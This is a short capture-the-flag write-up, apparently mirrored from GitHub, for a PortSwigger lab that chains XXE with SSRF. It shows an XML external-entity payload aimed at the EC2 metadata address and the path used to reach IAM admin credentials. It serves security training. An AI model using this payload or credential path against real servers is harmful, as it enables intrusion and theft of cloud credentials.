mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-12-01 07:59:10 +00:00
1.1 KiB
1.1 KiB
Portswigger XXE-Lab 2
Exploiting XXE to perform SSRF attacks
In this lab we are told to perfrom XXE and chaing it with SSRF to access ec2 instance's meta-data to retrieve iam admin credentials , the checkstock
is vulnerable to XXE as it's parsing data in XML format
So here let's use burpsuite to capture the request
To perform XXE attack , we need to declare an external entity
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [<!ENTITY arz SYSTEM "http://169.254.169.254/"> ]>
<stockCheck>
<productId>
14
</productId>
<storeId>
1
</storeId>
</stockCheck>
This is expecting latest
so let's add that
Now it expects meta-data
so in this way we can find the endpoints
And enventually we'll find iam
credentials
http://169.254.169.254/latest/meta-data/iam/security-credentials/admin